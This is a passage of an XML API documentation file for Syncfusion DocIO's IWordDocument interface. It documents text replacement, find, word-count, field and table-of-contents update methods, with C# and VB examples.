            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Load the another existing Word document to replace
                WordDocument replaceDocument = new WordDocument("Replace.docx");
                //Replace all occurrence of a particular regular expression with the another document
                document.Replace("Giant panda", replaceDocument, true, false);            
                //Save and Close the documents
                document.Save("Sample.docx", FormatType.Docx);
                replaceDocument.Close();
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Load the another existing Word document to replace
                Dim replaceDocument As New WordDocument("Replace.docx")
                'Replace all occurrence of a particular regular expression with the another document
                document.Replace("Giant panda", replaceDocument, True, False)
                'Save and Close the documents
                document.Save("Sample.docx", FormatType.Docx)
                replaceDocument.Close();
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.String,Syncfusion.DocIO.DLS.IWordDocument,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with another Word document, taking into
            consideration case sensitive, whole word and formatting options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replaceDoc">The Word document to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="saveFormatting">Set to <b>true </b> to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Load the another existing Word document to replace
                WordDocument replaceDocument = new WordDocument("Replace.docx");
                //Replace all occurrence of a particular regular expression with the another document
                document.Replace("Giant panda", replaceDocument, true, false, true);            
                //Save and Close the documents
                document.Save("Sample.docx", FormatType.Docx);
                replaceDocument.Close();
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Load the another existing Word document to replace
                Dim replaceDocument As New WordDocument("Replace.docx")
                'Replace all occurrence of a particular regular expression with the another document
                document.Replace("Giant panda", replaceDocument, True, False, True)
                'Save and Close the documents
                document.Save("Sample.docx", FormatType.Docx)
                replaceDocument.Close();
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.IWordDocument,System.Boolean)">
            <summary>
            Replaces all entries of given regular expression in the document with the 
            another word document along with its formatting.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replaceDoc">The Word document to replace.</param>
            <param name="saveFormatting">Set to <b>true </b> to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Load the another existing Word document to replace
                WordDocument replaceDocument = new WordDocument("Replace.docx");
                //Replace all occurrence of a particular regular expression with the another document
                document.Replace(new Regex("Giant panda"), replaceDocument, true);            
                //Save and Close the documents
                document.Save("Sample.docx", FormatType.Docx);
                replaceDocument.Close();
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Load the another existing Word document to replace
                Dim replaceDocument As New WordDocument("Replace.docx")
                'Replace all occurrence of a particular regular expression with the another document
                document.Replace(New Regex("Giant panda"), replaceDocument, True)
                'Save and Close the documents
                document.Save("Sample.docx", FormatType.Docx)
                replaceDocument.Close();
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.UpdateWordCount">
            <summary>
            Update Paragraphs count, Word count and Character count in the document
            </summary>
            <remarks>
            <para>This method is not supported in Silverlight, WinRT, Universal, Universal Windows Platform, MVC6, Xamarin and windows phone platforms.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to update Paragraphs count, Word count and Character count in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input word template
                WordDocument document = new WordDocument(@�Template.docx�);
                //Update the Paragraphs count, Word count and Character count in the document
                document.UpdateWordCount();
                //Save and close the Word document instance.
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input word template
                Dim document As New WordDocument("Template.docx")
                'Update the Paragraphs count, Word count and Character count in the document.
                document.UpdateWordCount()
                �Save and close the Word document instance.
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.UpdateWordCount(System.Boolean)">
            <summary>
            Updates Paragraphs count, Word count and Character count. Updates page count if performLayout set to true using Doc to PDF layouting engine.
            </summary>
            <param name="performRelayout">Set to <b>true</b> to update the page count of the document using Word to PDF layouting engine; otherwise, <b>false</b>. The default is <b>false</b>.</param>
            <remarks>
            <para>This method is not supported in Silverlight, WinRT, Universal, Universal Windows Platform, MVC6, Xamarin and windows phone platforms.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to update Page count, Paragraphs count, Word count and Character count in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input word template
                WordDocument document = new WordDocument(@�Template.docx�);
                //Update the Page count, Paragraphs count, Word count and Character count in the document
                document.UpdateWordCount(true);
                //Save and close the Word document instance.
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input word template
                Dim document As New WordDocument("Template.docx")
                'Update the Page count, Paragraphs count, Word count and Character count in the document.
                document.UpdateWordCount(True)
                �Save and close the Word document instance.
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.UpdateDocumentFields">
            <summary>
            Updates fields present in the document.
            </summary>
            <remarks>
            <para>Updating of NUMPAGES field and Cross Reference field with Page number and Paragraph number options are not supported in Silverlight, WinRT, Universal, Windows Phone and Xamarin platforms.</para>
            <para>Currently group shapes, drawing canvas, and table auto resizing are not supported in Word to PDF lay outing, and this may lead to update incorrect page number and total number of pages.</para>
            <para>While updating NUMPAGES field and Cross Reference field with Page number and Paragraph number options uses makes use of our Word to PDF layouting engine which may lead to take some considerable amount of performance to update the above mentioned fields.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to update the fields present in Word document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Input.docx", FormatType.Docx);
                //Updates the fields present in a document.
                document.UpdateDocumentFields();
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Input.docx", FormatType.Docx)
                'Updates the fields present in a document.
                document.UpdateDocumentFields()
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.UpdateAlternateChunks">
            <summary>
            Updates the Alternate chunks present in the Word document
            </summary>
            <example>
            <para>The following code example demonstrates how to update the Alternate chunks present in Word document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Input.docx", FormatType.Docx);
                //Updates the Alternate chunks present in a document.
                document.UpdateAlternateChunks();
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Input.docx", FormatType.Docx)
                'Updates the Alternate chunks present in a document.
                document.UpdateAlternateChunks()
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.UpdateTableOfContents">
            <summary>
            Update Table of contents in the document.
            </summary>
            <remarks>
            <para>Updating TOC makes use of our Word to PDF layouting engine which may lead to the updation of incorrect page number due to its limitations. Also use of WOrd to PDF layout engine may lead to take some considerable amount of performance to update the page numbers.</para>
            <para>This method is not supported in Silverlight, WinRT, Universal, Universal Windows Platform, MVC6, Xamarin and windows phone platforms.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to update a TOC in an existing word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input word template
                WordDocument document = new WordDocument(@�Template.docx�);
                //Update the table of contents.
                document.UpdateTableOfContents();
                //Save and close the Word document instance.
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input word template
                Dim document As New WordDocument("Template.docx")
                'Update the table of contents.
                document.UpdateTableOfContents()
                �Save and close the Word document instance.
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.ReplaceSingleLine(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string which is extended to several paragraphs in the document with replace string, taking into
            consideration of case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace the text extended to several paragraphs with simple text.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Replace the text extended to two paragraphs with simple text
                document.ReplaceSingleLine("First paragraph Second paragraph", "Replaced paragraph", true, false);
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Replace the text extended to two paragraphs with simple text
                document.ReplaceSingleLine("First paragraph Second paragraph", "Replaced paragraph", True, False)
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.ReplaceSingleLine(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of the specified pattern text, which is extended to several paragraph, with replace text.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns> 
            <example>
            <para>The following code example demonstrates how to replace the text extended to several paragraphs with simple text.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Replace the text extended to two paragraphs with simple text
                document.ReplaceSingleLine(new Regex("First paragraph Second paragraph"), "Replaced paragraph");
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Replace the text extended to two paragraphs with simple text
                document.ReplaceSingleLine(New Regex("First paragraph Second paragraph"), "Replaced paragraph")
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.ReplaceSingleLine(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string which is extended to several paragraph in the document with <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>, taking into
            consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replacement">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace the text extended to several paragraphs with another text.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text in the document
                TextSelection selection = document.Find("contents", false, false);
                //Replace the text extended to two paragraphs with text selection
                document.ReplaceSingleLine("First paragraph Second paragraph", selection, true, false);
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text in the document
                Dim selection As TextSelection = document.Find("contents", False, False)
                'Replace the text extended to two paragraphs with text selection
                document.ReplaceSingleLine("First paragraph Second paragraph", selection, True, False)
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.ReplaceSingleLine(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Replaces all entries of given regular expression text which is extended to several paragraph in the document with the 
            <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replacement">The text selection to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace the text extended to several paragraphs with another text.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text in the document
                TextSelection selection = document.Find("contents", false, false);
                //Replace the text extended to two paragraphs with text selection
                document.ReplaceSingleLine(new Regex("First paragraph Second paragraph"), selection);
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text in the document
                Dim selection As TextSelection = document.Find("contents", False, False)
                'Replace the text extended to two paragraphs with text selection
                document.ReplaceSingleLine(New Regex("First paragraph Second paragraph"), selection)
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.ReplaceSingleLine(System.String,Syncfusion.DocIO.DLS.TextBodyPart,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string which is extended to several paragraphs in the document with <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>, taking into
            consideration case sensitive, whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replacement">The text body part to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">if it specifies whole word, set to <c>true</c>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace the text extended to several paragraphs with <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text in the document
                TextSelection selection = document.Find("contents", false, false);
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.ReplaceSingleLine("First paragraph Second paragraph", bodyPart, true, false);
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text in the document
                Dim selection As TextSelection = document.Find("contents", False, False)
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.ReplaceSingleLine("First paragraph Second paragraph", bodyPart, True, False)
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.ReplaceSingleLine(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextBodyPart)">
            <summary>
            Replaces all entries of given regular expression text which is extended to several paragraph in the document with the 
            <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replacement">The text body part to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace the text extended to several paragraphs with <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text in the document
                TextSelection selection = document.Find("contents", false, false);
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.ReplaceSingleLine(new Regex("First paragraph Second paragraph"), bodyPart);
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text in the document
                Dim selection As TextSelection = document.Find("contents", False, False)
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.ReplaceSingleLine(New Regex("First paragraph Second paragraph"), bodyPart)
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.FindNext(Syncfusion.DocIO.DLS.TextBodyItem,System.String,System.Boolean,System.Boolean)">
            <summary>
            Finds the next entry of the specified text from the specified text body item, taking into the consideration of caseSensitive
            and wholeWord options.
            </summary>
            <param name="startTextBodyItem">The <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> that represents the start body item at which search starts (paragraph or table).</param>
            <param name="given">
            A string used to find the text.
            </param>
            <param name="caseSensitive">
            Set to <b>true</b> to match the similar case text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <param name="wholeWord">
            Set to <b>true</b> to match the whole word text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <returns>
            The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the document.
            </returns>
            <example>
            <para>The following code example demonstrates how to find a particular text and its next occurrence in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text in the document
                TextSelection textSelection = document.Find("as graphical contents", false, true);
                //Get the found text as single text range
                WTextRange textRange = textSelection.GetAsOneRange();
                //Modify the text
                textRange.Text = "Replaced text";
                //Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow;
                //Find the next occurrence of a particular text from the previous paragraph
                textSelection = document.FindNext(textRange.OwnerParagraph, "paragraph", true, false);
                //Get the found text as single text range
                WTextRange range = textSelection.GetAsOneRange();
                //Set bold formatting
                range.CharacterFormat.Bold = true;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text in the document
                Dim textSelection As TextSelection = document.Find("as graphical contents", false, true)
                'Get the found text as single text range
                Dim textRange As WTextRange = textSelection.GetAsOneRange()
                'Modify the text
                textRange.Text = "Replaced text"
                'Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow
                'Find the next occurrence of a particular text from the previous paragraph
                textSelection = document.FindNext(textRange.OwnerParagraph, "paragraph", true, false)
                'Get the found text as single text range
                Dim range As WTextRange = textSelection.GetAsOneRange()
                'Set bold formatting
                range.CharacterFormat.Bold = True
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.FindNext(Syncfusion.DocIO.DLS.TextBodyItem,System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the next entry of the specified regular expression from the specified text body item.
            </summary>
            <param name="startBodyItem">The <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> that represents the start body item at which search starts (paragraph or table).</param>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the document.</returns>
            <example>
            <para>The following code example demonstrates how to find a particular text and its next occurrence in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text in the document
                TextSelection textSelection = document.Find("as graphical contents");
                //Get the found text as single text range
                WTextRange textRange = textSelection.GetAsOneRange();
                //Modify the text
                textRange.Text = "Replaced text";
                //Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow;
                //Find the next occurrence of a particular text from the previous paragraph
                textSelection = document.FindNext(textRange.OwnerParagraph, "paragraph");
                //Get the found text as single text range
                WTextRange range = textSelection.GetAsOneRange();
                //Set bold formatting
                range.CharacterFormat.Bold = true;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text in the document
                Dim textSelection As TextSelection = document.Find("as graphical contents")
                'Get the found text as single text range
                Dim textRange As WTextRange = textSelection.GetAsOneRange()
                'Modify the text
                textRange.Text = "Replaced text"
                'Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow
                'Find the next occurrence of a particular text from the previous paragraph
                textSelection = document.FindNext(textRange.OwnerParagraph, "paragraph")
                'Get the found text as single text range
                Dim range As WTextRange = textSelection.GetAsOneRange()
                'Set bold formatting
                range.CharacterFormat.Bold = True
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.FindNextSingleLine(Syncfusion.DocIO.DLS.TextBodyItem,System.String,System.Boolean,System.Boolean)">
            <summary>
            Finds the next entry of the specified text from the specified text body item in single-line mode which is extended to several paragraph in the document, taking into the consideration of caseSensitive
            and wholeWord options.
            </summary>
            <param name="startTextBodyItem">The <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> that represents the start body item at which search starts (paragraph or table).</param>
            <param name="given">
            A string used to find the text.
            </param>
            <param name="caseSensitive">
            Set to <b>true</b> to match the similar case text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <param name="wholeWord">
            Set to <b>true</b> to match the whole word text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <returns>
            The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the document.
            </returns>
            <example>
            <para>The following code example demonstrates how to find a particular text and its next occurrence which is extended to several paragraphs in the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text extended to several paragraphs in the document
                TextSelection[] textSelections = document.FindSingleLine("First paragraph Second paragraph", true, false);
                WParagraph paragraph = null;
                foreach (TextSelection textSelection in textSelections)
                {
                    //Get the found text as single text range and set highlight color
                    WTextRange textRange = textSelection.GetAsOneRange();
                    textRange.CharacterFormat.HighlightColor = Color.YellowGreen;
                    paragraph = textRange.OwnerParagraph;
                }
                //Find the next occurrence of a particular text extended to several paragraphs in the document
                textSelections = document.FindNextSingleLine(paragraph, "First paragraph Second paragraph", true, false);
                foreach (TextSelection textSelection in textSelections)
                {
                    //Get the found text as single text range and set italic formatting
                    WTextRange text = textSelection.GetAsOneRange();
                    text.CharacterFormat.Italic = true;
                }
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text extended to several paragraphs in the document
                Dim textSelections As TextSelection() = document.FindSingleLine("First paragraph Second paragraph", True, False)
                Dim paragraph As WParagraph = Nothing
                  For Each textSelection As TextSelection In textSelections
                      'Get the found text as single text range and set highlight color
                      Dim textRange As WTextRange = textSelection.GetAsOneRange()
                      textRange.CharacterFormat.HighlightColor = Color.YellowGreen
                      paragraph = textRange.OwnerParagraph
                  Next
                'Find the next occurrence of a particular text extended to several paragraphs in the document
                textSelections = document.FindNextSingleLine(paragraph, "First paragraph Second paragraph", True, False)
                For Each textSelection As TextSelection In textSelections
                    'Get the found text as single text range and set italic formatting
                    Dim text As WTextRange = textSelection.GetAsOneRange()
                    text.CharacterFormat.Italic = True
                Next
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.FindNextSingleLine(Syncfusion.DocIO.DLS.TextBodyItem,System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the next entry of the specified pattern of text in single-line mode which is extended to several paragraph in the document.
            </summary>
            <param name="startBodyItem">The <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> that represents the start body item at which search starts (paragraph or table).</param>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the document.</returns>
            <example>
            <para>The following code example demonstrates how to find a particular text and its next occurrence which is extended to several paragraphs in the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text extended to several paragraphs in the document
                TextSelection[] textSelections = document.FindSingleLine("First paragraph Second paragraph", true, false);
                WParagraph paragraph = null;
                foreach (TextSelection textSelection in textSelections)
                {
                    //Get the found text as single text range and set highlight color
                    WTextRange textRange = textSelection.GetAsOneRange();
                    textRange.CharacterFormat.HighlightColor = Color.YellowGreen;
                    paragraph = textRange.OwnerParagraph;
                }
                //Find the next occurrence of a particular text extended to several paragraphs in the document
                textSelections = document.FindNextSingleLine(paragraph, new Regex("First paragraph Second paragraph"));
                foreach (TextSelection textSelection in textSelections)
                {
                    //Get the found text as single text range and set italic formatting
                    WTextRange text = textSelection.GetAsOneRange();
                    text.CharacterFormat.Italic = true;
                }
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text extended to several paragraphs in the document
